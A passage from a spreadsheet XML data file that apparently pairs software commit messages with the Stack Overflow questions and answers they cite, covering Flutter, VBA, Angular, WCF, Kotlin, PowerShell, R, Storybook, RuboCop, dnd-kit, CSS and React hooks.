        .eq('id', user?.id ?? '')
        .single();
    return UserClass.fromMap(response);
  }
  Future&amp;lt;void&amp;gt; updateUserAndRefetch(Map&amp;lt;String, dynamic&amp;gt; updatedData) async {
    await supabase
        .from('users')
        .update(updatedData)
        .eq('id', state.value?.id ?? '');
    ref.invalidateSelf();
  }
  Future&amp;lt;void&amp;gt; updateUserNoRefetch(Map&amp;lt;String, dynamic&amp;gt; updatedData) async {
    await supabase
        .from('users')
        .update(updatedData)
        .eq('id', state.value?.id ?? '');
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To avoid infinite re-render loop i built another function without invalidating&lt;/p&gt;
&lt;p&gt;Is this the right way? Can someone advise me please&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C35</t>
  </si>
  <si>
    <t xml:space="preserve">Support registering a new authenticator
This adds Yubico's FIDO2 library and two APIs for working with the
"navigator.credentials.create()" function in JavaScript. The GET
API uses the library to generate options for the "create()" function,
and the POST API decodes and verifies the resulting credential. While
the options and response are dict-like, CBOR is necessary to encode
some of the byte-level values, which can't be represented in JSON.
Much of the code here is based on the Yubico library example:
 WebAuthn only works over HTTPS, but there's an exception for "localhost": https://stackoverflow.com/questions/55971593/navigator-credentials-is-null-on-local-server </t>
  </si>
  <si>
    <t>WebAuthn javascript will work only when used with HTTPS or on the localhost hostname (in this case HTTPS is not required).
It seems that you are using an IP address.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i've got a problem:
When i run this code have &amp;quot;money = 0,00?&amp;quot; for the employes and correct money for the &amp;quot;bosses&amp;quot; of my project:&lt;/p&gt;
&lt;pre class="lang-vb prettyprint-override"&gt;&lt;code&gt;Sub CalculateBonuses()
    Dim BonusFund As Currency
    Dim role As Variant
    BonusFund = 100000 'example
    Const CURATOR_PERC As Double = 0.1
    Const CUSTOMER_PERC As Double = 0.1
    Const MANAGER_PERC As Double = 0.05
    Const PLANNER_PERC As Double = 0.02
    Dim TotalPerformerPayment As Currency
    TotalPerformerPayment = 0.72 * BonusFund
    Dim performers As Object
    Set performers = CreateObject(&amp;quot;Scripting.Dictionary&amp;quot;)
    Dim adminRoles As Object
    Set adminRoles = CreateObject(&amp;quot;Scripting.Dictionary&amp;quot;)
    adminRoles.Add &amp;quot;Boss 1&amp;quot;, 0#
    adminRoles.Add &amp;quot;Boss 2&amp;quot;, 0#
    adminRoles.Add &amp;quot;Boss 3&amp;quot;, 0#
    adminRoles.Add &amp;quot;Boss 4&amp;quot;, 0#
    ' Step 1
    Dim t As Task
    Dim SumBaseline As Double
    SumBaseline = 0
    For Each t In ActiveProject.Tasks
        If Not t Is Nothing Then
            Dim a As Assignment
            For Each a In t.Assignments
                If IsAdminRole(a.Resource.Name) Then
                Else
                    If t.Baseline1Duration &amp;gt; 0 Then
                        Debug.Print &amp;quot;Employe: &amp;quot; &amp;amp; a.Resource.Name &amp;amp; _
                                  &amp;quot; | Name: &amp;quot; &amp;amp; t.Name &amp;amp; _
                                  &amp;quot; | Baseline: &amp;quot; &amp;amp; t.Baseline1Duration &amp;amp; _
                                  &amp;quot; | Actual: &amp;quot; &amp;amp; t.ActualDuration
                        SumBaseline = SumBaseline + t.Baseline1Duration
                    Else
                        MsgBox &amp;quot;Error: BaselineDuration = 0 for the task '&amp;quot; &amp;amp; t.Name &amp;amp; &amp;quot;'&amp;quot;, vbCritical
                    End If
                End If
            Next a
        End If
    Next t
    If SumBaseline = 0 Then
        MsgBox &amp;quot;Baseline is 0!&amp;quot;, vbCritical
        Exit Sub
    End If
    'Step 2
    For Each t In ActiveProject.Tasks
        If Not t Is Nothing Then
            For Each a In t.Assignments
                Dim resName As String
                resName = a.Resource.Name
                If IsAdminRole(resName) Then GoTo SkipPerformer
                If Not performers.Exists(resName) Then
                    performers.Add resName, Array(0#, 0#) ' [Money, remains]
                End If
                Dim baseline As Double
                Dim actual As Double
                baseline = t.Baseline1Duration
                actual = t.ActualDuration
                If actual &amp;lt;= 0 Then actual = baseline 
                If baseline &amp;lt;= 0 Then baseline = actual 
                Dim initialPayment As Double
                initialPayment = (baseline / SumBaseline) * TotalPerformerPayment
                Dim efficiency As Double
                efficiency = baseline / actual
                Dim payment As Double
                payment = initialPayment * efficiency
                If payment &amp;lt; 0.2 * initialPayment Then
                    payment = 0.2 * initialPayment
                End If
                performers(resName)(0) = performers(resName)(0) + payment
                performers(resName)(1) = performers(resName)(1) + (initialPayment - payment)
SkipPerformer:
            Next a
        End If
    Next t
' Step 3
    Dim projectStart As Date
    Dim projectEnd As Date
    projectStart = ActiveProject.projectStart
    projectEnd = ActiveProject.ProjectFinish
    Dim totalDays As Long
    totalDays = DateDiff(&amp;quot;d&amp;quot;, projectStart, projectEnd)
    For Each role In adminRoles.Keys
        Dim maxPayment As Currency
        Select Case role
            Case &amp;quot;Boss 1&amp;quot;: maxPayment = CURATOR_PERC * BonusFund
            Case &amp;quot;Boss 2&amp;quot;: maxPayment = CUSTOMER_PERC * BonusFund
            Case &amp;quot;Boss 3&amp;quot;: maxPayment = MANAGER_PERC * BonusFund
            Case &amp;quot;Boss 4&amp;quot;: maxPayment = PLANNER_PERC * BonusFund
        End Select
        Dim totalRoleDays As Long
        totalRoleDays = 0
        For Each t In ActiveProject.Tasks
            If Not t Is Nothing Then
                For Each a In t.Assignments
                    If a.Resource.Name = role Then
                        totalRoleDays = totalRoleDays + t.ActualDuration
                    End If
                Next a
            End If
        Next t
        Dim calculatedPayment As Currency
        calculatedPayment = (totalRoleDays / totalDays) * maxPayment
        If calculatedPayment &amp;lt; maxPayment Then
            adminRoles(role) = calculatedPayment
        Else
            adminRoles(role) = maxPayment
        End If
    Next role
    'Step 4
    Dim result As String
    result = &amp;quot;Result of calculation:&amp;quot; &amp;amp; vbCrLf &amp;amp; vbCrLf
    Dim performer As Variant
    For Each performer In performers.Keys
        result = result &amp;amp; &amp;quot;Employe: &amp;quot; &amp;amp; performer &amp;amp; vbCrLf
        result = result &amp;amp; &amp;quot;Money: &amp;quot; &amp;amp; FormatCurrency(performers(performer)(0)) &amp;amp; vbCrLf
        result = result &amp;amp; &amp;quot;Remains: &amp;quot; &amp;amp; FormatCurrency(performers(performer)(1)) &amp;amp; vbCrLf &amp;amp; vbCrLf
    Next performer
    For Each role In adminRoles.Keys
        result = result &amp;amp; &amp;quot;Role: &amp;quot; &amp;amp; role &amp;amp; vbCrLf
        result = result &amp;amp; &amp;quot;Money: &amp;quot; &amp;amp; FormatCurrency(adminRoles(role)) &amp;amp; vbCrLf
        result = result &amp;amp; &amp;quot;Amount: &amp;quot; &amp;amp; FormatCurrency( _
            GetAdminMaxPayment(role, BonusFund) - adminRoles(role) _
        ) &amp;amp; vbCrLf &amp;amp; vbCrLf
    Next role
    MsgBox result
End Sub
Function GetAdminMaxPayment(ByVal role As String, ByVal BonusFund As Currency) As Currency
    Select Case role
        Case &amp;quot;Boss 1&amp;quot;: GetAdminMaxPayment = 0.1 * BonusFund
        Case &amp;quot;Boss 2&amp;quot;: GetAdminMaxPayment = 0.1 * BonusFund
        Case &amp;quot;Boss 3&amp;quot;: GetAdminMaxPayment = 0.05 * BonusFund
        Case &amp;quot;Boss 4&amp;quot;: GetAdminMaxPayment = 0.02 * BonusFund
    End Select
End Function
Function IsAdminRole(roleName As String) As Boolean
    Select Case roleName
        Case &amp;quot;Boss 1&amp;quot;, &amp;quot;Boss 2&amp;quot;, &amp;quot;Boss 3&amp;quot;, &amp;quot;Boss 4&amp;quot;
            IsAdminRole = True
        Case Else
            IsAdminRole = False
    End Select
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Have no idea what's wrong with this code. Could u help me please? In the Immediate console everything's ok, but at the end... &amp;quot;0,00?&amp;quot;
Oh God, i saw it in my nightmare yesterday.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C350</t>
  </si>
  <si>
    <t>Classes to use Flex in styles.css - body, app-root, main, router-outl
et + *, tabContainer, tabContent, col-stretch
.flexRowCenter
Rejig Home Component to use css flex rather than angular flex layout (deprecated)
Still not able to use Material Tabs - https://stackoverflow.com/questions/74974663/angular-15-material-tab-control-is-it-possible-to-auto-scroll-content-only</t>
  </si>
  <si>
    <t>With Angular Material 15, is it possible to keep the tab control
tabs
in view when the
content
overflows and apply scrollbars to the content only?
View on
Stackblitz
I've previously rejected the use of
Material Tab Control
as it didn't work well with
Flex Layout
. As @angular/flex-layout is now deprecated, I've given this another go using
CSS Flexbox
. However, I can't work out how to add scrollbars to the content only when the content overflows.
The issue is described
here
but the Stackblitz links are no longer working and the solution proposed by
liviu-nita
seems like a less than ideal work-around.
Dynamic height
seems to be irrelevant to the issue, and I've not been able to adapt the answer
here
.
Demo of the issue on
Stackblitz
How the control is rendered:</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the process of designing a simple service-oriented architecture using WCF as the implementation framework. There are a handful of services that a few applications use. These services are mostly used internally, so a basic authentication and authorization scheme (such as Windows-based) is enough.
We want, however, expose some of the services to some business partners. The set of services they have access to depend on the contract. Kind of a standard architecture.
I think we can implement a service gateway which authenticates the requests and relays them to the correct internal service endpoint (this resembles simple ESB), so we can centralize the authentication/authorization code and expose one single endpoint to the world. I looked at some available ESB toolkits, but they seem way too complex for this purpose. We do not need to integrate a lot of different services, but just to expose some of them to the Internet.
How can I design and implement such a relay/router in WCF, keeping it very simple? I have read [external-link], which is a good book, but I'm still not confident enough on how to begin.
</t>
  </si>
  <si>
    <t>C351</t>
  </si>
  <si>
    <t>Move base test classes to separate module: kotlinx.interval.test
Currently, this is the only way these test sources can be reused by `kotlinx.interval` extensions (https://stackoverflow.com/q/58956010/590790), such as the upcoming `kotlinx.interval.datetime` module.</t>
  </si>
  <si>
    <t>To establish a dependency of this sort between single-platform projects, you would normally need to create a Gradle
Configuration
in the producer project, add the test compilation outputs or a test JAR into that configuration, and, in the consumer project, depend on that configuration (i.e. add a
project(...)
dependency
with an explicit configuration
or, more preferrable, add attributes to ensure that Gradle chooses the test-outputs configuration in
variant-aware dependency resolution
).
However, all of this requires that tests are compiled to a form that could be reused by the consumer project's common source sets. With Kotlin Multiplatform projects, this is not yet the case. While the
production
common source sets, which participate in published compilations, are compiled to Kotlin metadata (
*.kotlin_metadata
files), test sources and other kinds of non-published code are not yet transformed to that format.
Instead, tests are currently only compiled to the final platform-specific binaries (i.e.
*.class
files,
*.js
, Native binaries), which cannot be used for common sources analysis.
Therefore, dependencies of this kind are not supported yet. This could change in the future. Please follow this issue in the Kotlin issue tracker:
KT-35073
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to set an alias in PowerShell for various terraform commands, such as terraform plan.  However, whenever I run &lt;code&gt;Set-Alias -Name &amp;quot;tfp&amp;quot; -Value &amp;quot;terraform plan&amp;quot;&lt;/code&gt; or &lt;code&gt;New-Alias -Name &amp;quot;tfp&amp;quot; -Value &amp;quot;terraform plan&amp;quot;&lt;/code&gt; I am getting the below error.  Any help is greatly appreciated.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tff: The term 'terraform plan' is not recognized as a name of a cmdlet, function, script file, or executable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C352</t>
  </si>
  <si>
    <t>* add component method for historical VaR per request at http://stackoverflow.com/questions/27243094/
*normalize labels for historical component ES</t>
  </si>
  <si>
    <t>The 'historical' method is not a 'simulation' method.  It is a measure of the realized historical loss quantile.
I have added historical contribution to
PerformanceAnaltytics
in v 1.4.3574 on R-Forge.
Your example now produces:
&gt; VaR(edhec, p=.95, method="historical", portfolio_method="component")
no weights passed in, assuming equal weighted portfolio
$hVaR
  hVaR 95% 
0.01419502 
$contribution
Convertible.Arbitrage             CTA.Global  Distressed.Securities       Emerging.Markets  Equity.Market.Neutral           Event.Driven Fixed.Income.Arbitrage           Global.Macro      Long.Short.Equity 
        -0.0006396664          -0.0001887839          -0.0007621405          -0.0020091076          -0.0001331756          -0.0008771216          -0.0004113300          -0.0006202640          -0.0010782781 
  Merger.Arbitrage         Relative.Value          Short.Selling         Funds.of.Funds 
     -0.0002735736          -0.0005046562           0.0012263158          -0.0008257281 
$pct_contrib_hVaR
 Convertible.Arbitrage             CTA.Global  Distressed.Securities       Emerging.Markets  Equity.Market.Neutral           Event.Driven Fixed.Income.Arbitrage           Global.Macro      Long.Short.Equity 
        0.09012547             0.02659862             0.10738139             0.28307218             0.01876371             0.12358159             0.05795412             0.08739178             0.15192344 
  Merger.Arbitrage         Relative.Value          Short.Selling         Funds.of.Funds 
        0.03854501             0.07110328            -0.17278113             0.11634054
It is available from SVN now, should be available in binary form 'soon', and will be included in the next release of
PerformanceAnalytics</t>
  </si>
  <si>
    <t xml:space="preserve">We are about to develop a web app from scratch using ASP.Net, and would like it to be as platform-agnostic as possible. As far as I know, the only two options for this are IIS on windows, and Mono (via Apache) on Linux.
The app will be follow the MVC architecture, so with all of this in mind, how difficult is it to develop the application so that it meets these requirements? (I would think that ground-up platform-agnostic development would be easier than porting an existing app.)
</t>
  </si>
  <si>
    <t>C353</t>
  </si>
  <si>
    <t>stories complained about Link components outside of Router
https://stackoverflow.com/questions/58909666/storybook-w-react-router-you-should-not-use-link-outside-router</t>
  </si>
  <si>
    <t>The problem was Storybook rendering the individual stories. In this case the component using
&lt;Link&gt;
was in fact rendered outside a
&lt;Router&gt;
.
The solution was to wrap the individual stories with the
&lt;Router&gt;
using addDecorator;
//config.js
//...
addDecorator(story =&gt; &lt;Router&gt;{story()}&lt;/Router&gt;);</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hello I am receiving the error in the title based off the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class MainViewModel (application: Application, private val savedStateHandle: SavedStateHandle) : AndroidViewModel(application){
var showPod : MutableLiveData&amp;lt;Boolean&amp;gt;
        set(value) {
            savedStateHandle.set(&amp;quot;showPod&amp;quot;, value)
        }
        get() {
            return savedStateHandle.getLiveData&amp;lt;Boolean&amp;gt;(&amp;quot;showPod&amp;quot;)
        }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've explicitly defined the type to be Boolean in the MutableLiveData, I'm not sure why the error persists..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C354</t>
  </si>
  <si>
    <t>handle invalid combo task annotations in csv formatter (#2395)
* handle invalid combotask annotations in csv formatter
some combo task annotations are malformed and do not embed
the annotation values in the expected format (see specs).
Now the code will report and error in the output file and
move on instead of failing.
* better spec variable naming
* use correct alignment and indentation
* ignore long rspec blocks
https://stackoverflow.com/questions/40934345/rubocop-25-line-block-size-and-rspec-tests</t>
  </si>
  <si>
    <t>A recent upgrade of Rubocop brought a new rule into play, that blocks should be no longer than 25 lines. I'm not sure of the rationale for it, because it is not listed in the Ruby style guide.
It used to be that all the cops were based on The Ruby Style Guide, and RuboCop was a way to adhere to the practices set out by the community.
Direction has changed since then, and the scope of RuboCop has expanded to help developers ensure consistency in their code bases in general. This has lead to two things:
Cops (even those based on The Ruby Style Guide) are now mostly configuratble.
There are cops for things that aren't mentioned in the Ruby Style Guide, but are still useful for enforcing consistency in a project.
This cop falls in the second category.
Is RSpec using a now discredited approach for code layout, and what reasonable options do I have to reduce block sizes in our RSpec tests?
Short answer is no. DSLs are still cool. :-)
This cop is aimed at large block in the imperative programming sense. As a general guide, it does not apply to DSLs, which are often declarative. For example, having a long
routes.rb
file in Rails is perfectly benign. It's just a natural result of a large application, rather than a style violation. (And having a lot of tests is purely awesome.)
Now, RuboCop is pretty smart, but it doesn't know what is a DSL and not, so we can't automatically ignore them. One could argue that we could exclude DSL entry methods of popular frameworks, like Rails routes and RSpec specs. The reasons for not doing so are primarily:
False negatives. Any class can implement a method, taking a block, with the same name.
RuboCop is a Ruby analysis tool, and shouldn't really know about external libraries. (Excluding the
/spec
directory is a courtesy until we have a proper extension system, and this can be handled by the
rubocop-rspec
gem.)
I mean, that's do-able, but turning bunches of spec examples into helper functions in this way seems to be the opposite of the readable approach encouraged by RSpec design.
The bottom line is: RuboCop is there to help us write better code. If our application design is otherwise sound, and we find ourselves making things less readable merely to please RuboCop, then we should filter, configure, or disable the cop. :-)
In response, we have simply set the Rubocop block size rule to a high threshold. But that makes me wonder - what am I missing?
This is a rather blunt tool and, as you're hinting at, you will probably have some false negatives because of it. There are two types of false positives for this cop:
Files that contain purely declarative DSLs, e.g. Rails routes, RSpec specs.
Files that have a declarative DSL mixed into mostly imperative code, e.g. an
aasm
state machine declaration in a Rails model.
In the first case, the best solution is to exclude the file or directory, and in the second to use an inline disable.
In your case, you should update your
.rubocop.yml
with:
Metrics/BlockLength:
  Exclude:
    - 'Rakefile'
    - '**/*.rake'
    - 'test/**/*.rb'
(Note that you need to re-iterate the basic excludes from the default configuration, since the list will be overwritten.)</t>
  </si>
  <si>
    <t xml:space="preserve">I will begin this question by admitting I am very new to MVC. The design pattern makes sense to me at a high level, but now that I'm exploring ASP.NET MVC, some of the architectural pieces are challenging my preconceived notions. Learning is a good thing.
I've been working with [external-link] lately as a learning tool written by people at the [external-link] that created ASP.NET MVC and thus, an ostensible reference application for ASP.NET MVC.
But today I saw [external-link] by Rob Conery that says:
  One of the things that the Oxite team
  decided to do was to separate the
  Controllers and Views into another
  Project for what I can only assume is
  the separation of business logic from
  view logic. This can lead to some
  confusion since Controllers are meant
  to handle application flow - not
  necessarily business logic.
This has thrown me for a loop. Is this separation a tenet of MVC and thus a mistake by the Oxite developers, or is it Rob's opinion? If the business logic belongs in the model, why did the Oxite team put it in the controller? How do I execute an action that is business logic if not in the controller?
Further to that, am I making a mistake using Oxite as a learning benchmark considering comments like Rob's?
</t>
  </si>
  <si>
    <t>C355</t>
  </si>
  <si>
    <t>Add Temp. Drag Handle to Fix the No Space in Textarea issue
From what I've understood, this is a dnd-kit issue. I figured it out that assigning the listeners to the entire Card would cause the textarea preventing to create spaces of the program.
It's apparently interfering with the onChange event: https://stackoverflow.com/questions/77415442/listeners-from-dnd-kit-are-interfering-with-the-inputcheckboxs-onchange-event.
However, I have limited knowledge of how it works, but it's something along the lines with that.
Anyhow, I implemented the Drag Handle to not be that intrusive. I might make it a Component and put it to other Draggables.</t>
  </si>
  <si>
    <t>You should try to put delay in useSensors, then it will not drag until user holds the element.
Check in documentation:
Pointer Activation constraints
or
Touch Activation constraints
.
const sensors = useSensors(
    useSensor(MouseSensor, {
      activationConstraint: {
        distance: 8,
      },
    }),
    useSensor(TouchSensor, {
      activationConstraint: {
        delay: 200,
        tolerance: 6,
      },
    }),
    useSensor(KeyboardSensor, {
      coordinateGetter: sortableKeyboardCoordinates,
    }),
  );</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to make a header that stays fixed when I scroll down, but it only goes until the end of the header, which is set to &lt;code&gt;100vh&lt;/code&gt;. Does anyone have any idea how I can solve this without stopping using min-height?&lt;/p&gt;
&lt;p&gt;I tried using JS to replace the class with &lt;code&gt;fixed&lt;/code&gt; so that it only fixes after scrolling past the header, but without success.&lt;/p&gt;
&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-js lang-js prettyprint-override"&gt;&lt;code&gt;document.addEventListener('DOMContentLoaded', function() {
  const nav = document.getElementById('mainNav'); // Certifique-se de que o ID estÃ¡ correto
  const header = document.querySelector('.header');
  function handleScroll() {
    const headerHeight = header.offsetHeight;
    const scrollPosition = window.scrollY;
    if (scrollPosition &amp;gt; headerHeight) {
      nav.classList.add('fixed');
    } else {
      nav.classList.remove('fixed');
    }
  }
  window.addEventListener('scroll', handleScroll);
});&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;pre class="snippet-code-css lang-css prettyprint-override"&gt;&lt;code&gt;.header {
  min-height: 100vh;
  width: 100%;
  background-image: linear-gradient(rgba(4, 9, 30, 0.7), rgba(4, 9, 30, 0.7)), url('img/background-main.jpg');
  background-position: center;
  background-size: cover;
  text-align: center;
  color: #fff;
  position: relative;
}
nav {
  display: flex;
  padding: 2% 6%;
  justify-content: space-between;
  align-items: center;
  z-index: 1000;
}
nav.fixed {
  position: fixed;
  top: 0;
  left: 0;
  z-index: 1001;
}
nav img {
  width: 200px;
}
.nav-links {
  flex: 1;
  text-align: right;
}
.nav-links ul li {
  list-style: none;
  display: inline-block;
  padding: 8px 12px;
  position: relative;
}
.nav-links ul li a {
  color: #fff;
  text-decoration: none;
  font-size: 16px;
  font-weight: bold;
}
.nav-links ul li::after {
  content: '';
  width: 0%;
  height: 2px;
  background: #1b99ca;
  display: block;
  margin: auto;
  transition: 0.5s;
}
.nav-links ul li:hover::after {
  width: 100%;
}
.nav-links ul li:hover&amp;gt;ul.dropdown {
  display: block;
}
ul li ul.dropdown {
  position: absolute;
  top: 100%;
  left: 0;
  background-color: rgba(41, 145, 255, 0.425);
  z-index: 999;
  display: none;
  min-width: 130px;
  border-radius: 5px;
  box-shadow: 0px 4px 6px rgba(0, 0, 0, 0.2);
}
ul li ul.dropdown li {
  display: block;
  padding: 10px;
}
ul li ul.dropdown li a {
  color: #fff;
  text-decoration: none;
  display: block;
  font-size: 14px;
  font-weight: 600;
  transition: 0.3s;
  text-align: left;
}
ul li ul.dropdown li:hover {
  background: #003580;
}
.text-box {
  width: 90%;
  color: #fff;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  text-align: center;
}
.text-box h1 {
  font-size: 62px;
}
text-box p {
  margin: 10px 0 40px;
  font-size: 14px;
  color: #fff;
}
.hero-btn {
  display: inline-block;
  text-decoration: none;
  color: #fff;
  border: 1px solid #fff;
  padding: 12px 34px;
  font-size: 13px;
  background: transparent;
  position: relative;
  cursor: pointer;
  transition: 0.6s;
  margin-top: 15px;
  border-radius: 5px;
}
.hero-btn:hover {
  background-color: #1b99ca;
  border: 1px solid #1b99ca;
  transition: 1s;
}
nav .fa {
  display: none;
}
nav .fa-bars {
  font-size: 25px;
}&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&amp;amp;display=swap" rel="stylesheet"&amp;gt;
&amp;lt;link rel="stylesheet" href="index.css"&amp;gt;
&amp;lt;link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha512-Evv84Mr4kqVGRNSgIGL/F/aIDqQb7xQ2vcrdIwxfjThSH8CSR7PBEakCr51Ck+w+/U6swU2Im1vVX0SVk9ABhg==" crossorigin="anonymous" referrerpolicy="no-referrer"&amp;gt;
&amp;lt;section class="header"&amp;gt;
  &amp;lt;nav id="mainNav" class="mainNav"&amp;gt;
    &amp;lt;div class="logo"&amp;gt;
      &amp;lt;a href="index.html"&amp;gt; &amp;lt;img src="img/logo-padrao.png" alt="logo da JL Marine"&amp;gt;&amp;lt;/a&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;div class="nav-links" id="navLinks"&amp;gt;
      &amp;lt;i class="fa fa-times" onclick="hideMenu()"&amp;gt;&amp;lt;/i&amp;gt;
      &amp;lt;ul class="ul"&amp;gt;
        &amp;lt;li&amp;gt;&amp;lt;a href="index.html"&amp;gt;InÃ­cio&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;
          &amp;lt;a href="#"&amp;gt;Sobre&amp;lt;/a&amp;gt;
          &amp;lt;ul class="dropdown"&amp;gt;
            &amp;lt;li&amp;gt;&amp;lt;a href="sobre.html"&amp;gt;A Empresa&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
            &amp;lt;li&amp;gt;&amp;lt;a href="equipe.html"&amp;gt;Equipe&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
          &amp;lt;/ul&amp;gt;
        &amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;
          &amp;lt;a href="services/services.html"&amp;gt;ServiÃ§os&amp;lt;/a&amp;gt;
          &amp;lt;ul class="dropdown"&amp;gt;
            &amp;lt;li&amp;gt;&amp;lt;a href="services/marine.html"&amp;gt;Marine&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
            &amp;lt;li&amp;gt;&amp;lt;a href="services/log.html"&amp;gt;LogÃ­stica&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
            &amp;lt;li&amp;gt;&amp;lt;a href="services/desp-adua.html"&amp;gt;Despacho Aduaneiro&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
            &amp;lt;li&amp;gt;&amp;lt;a href="services/comex.html"&amp;gt;Comex&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
            &amp;lt;li&amp;gt;&amp;lt;a href="services/outros.html"&amp;gt;Outros&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
          &amp;lt;/ul&amp;gt;
        &amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;&amp;lt;a href="contacts.html"&amp;gt;Contato&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
      &amp;lt;/ul&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;i class="fa fa-bars" onclick="showMenu()"&amp;gt;&amp;lt;/i&amp;gt;
  &amp;lt;/nav&amp;gt;
  &amp;lt;div class="text-box"&amp;gt;
    &amp;lt;h1&amp;gt;ConheÃ§a a JL Marine!&amp;lt;/h1&amp;gt;
    &amp;lt;p&amp;gt;Confiabilidade &amp;amp; ExcelÃªncia&amp;lt;/p&amp;gt;
    &amp;lt;a href="sobre.html" class="hero-btn"&amp;gt;Saiba Mais&amp;lt;/a&amp;gt;
  &amp;lt;/div&amp;gt;
&amp;lt;/section&amp;gt;&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C356</t>
  </si>
  <si>
    <t>Make BodyWidget a function component
https://stackoverflow.com/questions/46240647/can-i-call-forceupdate-in-stateless-component</t>
  </si>
  <si>
    <t>🎉 You can now, using React hooks
👉🏻 using
useReducer
(short answer)
const [, forceUpdate] = useReducer(x =&gt; x + 1, 0);
From React FAQ
How to use:
function MyComponent(){
  const [, forceUpdate] = useReducer(x =&gt; x + 1, 0);
  return (
    &lt;div onClick={forceUpdate}&gt;
      Click me to refresh
    &lt;/div&gt;
  );
}
👉🏻 Using
useState
(more explicit answer)
Using react hooks, you can now call
useState()
in your function component.
useState()
will return an array of 2 things:
A value, representing the current state.
Its setter. Use it to update the value.
Updating the value by its setter will force your function component to re-render
,
just like
forceUpdate
does:
import React, { useState } from 'react';
//create your forceUpdate hook
function useForceUpdate(){
    const [value, setValue] = useState(0); // integer state
    return () =&gt; setValue(value =&gt; value + 1); // update state to force render
    // A function that increment 👆🏻 the previous state like here 
    // is better than directly setting `setValue(value + 1)`
}
function MyComponent() {
    // call your hook here
    const forceUpdate = useForceUpdate();
    return (
        &lt;div&gt;
            {/*Clicking on the button will force to re-render like force update does */}
            &lt;button onClick={forceUpdate}&gt;
                Click to re-render
            &lt;/button&gt;
        &lt;/div&gt;
    );
}
You can find a demo here
.
The component above uses a custom hook function (
useForceUpdate
) which uses the react state hook
useState
. It increments the component's state's value and thus tells React to re-render the component.
EDIT
In an old version of this answer, the snippet used a boolean value, and toggled it in
forceUpdate()
. Now that I've edited my answer, the snippet use a number rather than a boolean.
Why ?
(you would ask me)
Because once it happened to me that my
forceUpdate()
was called twice subsequently from 2 different events, and thus it was reseting the boolean value at its original state, and the component never rendered.
This is because in the
useState
's setter (
setValue
here),
React
compare the previous state with the new one,
and render only if the state is different.</t>
  </si>
  <si>
    <t xml:space="preserve">Let me set the stage here. I'm a very junior developer who's recently made the transition from Network Admin who does some WinForms for his employer to a full-time development position working on an ASP.NET product that will be transitioning to Silverlight. I have precious little web development experiences.  Some basic understanding of HTML and ASP.NET.  I have no JavaScript experience and have very minimal understanding of CSS.
My wife has asked me to develop a website for the local chapter of Junior Women's Club to which she belongs.  There are a few goals meant to be acclomplished by the site.
Create a real web presence for the chapter.  Currently they have only a single page on the local town website.
Provide a PR platform for the chapter.  Here are some of the community services we provide, here are some upcoming events, etc...
Help drive membership.  They're a small chapter and want to use the site as a mechanism to help increase membership, especially amongst younger women.
Act as an application for members to track basic information (e.g. list of members, etc...)
I have a few goals for myself on this project
Learn Silverlight (at least at a basic level).
Improve my knowledge of HTML.
Improve my knowledge of CSS.
Provide a reasonably searchable (from Google, et al.) site.
So, here are the basic high-level architectures (without consideration of DB, etc...) that come to mind for me.
Host an entire silverlight app in an HTML or ASPX page and buid the entire site in Silverlight. - This option strikes me as at best, less than optimal for building a searchable web presence.
Build an ASP.NET site with a master page to manage overall look &amp; feel and host Some Silverlight controls (Menu in header, rich control for photo album, controls for managing data, etc...) in appropriate locations. - This strikes me as easiest to maintain overall look &amp; feel while still maintaining some searchability.
Build a primarily HTML site, using CSS as the primary mechanism to manage look &amp; feel and host appropriate Silverlight controls where I want a rich interaction (as #2 above). - This strikes me as the most searchable option, but probably most difficult for me given my current skillset.
I realize that there are other options for architecture and want to hear those suggestions, but please keep in mind that I have an upcoming Silverlight project at work and want to use this in part as a vehicle to learn that technology, which means that an all HTML, CSS, JavaScript/JQuery options doesn't really provide that for me.
I'd also like hear what you all say regarding good resources (paid or free) to learn CSS and any aditional technologies I'd need to learn based on the choice made.
Thanks for your patience with the long post.
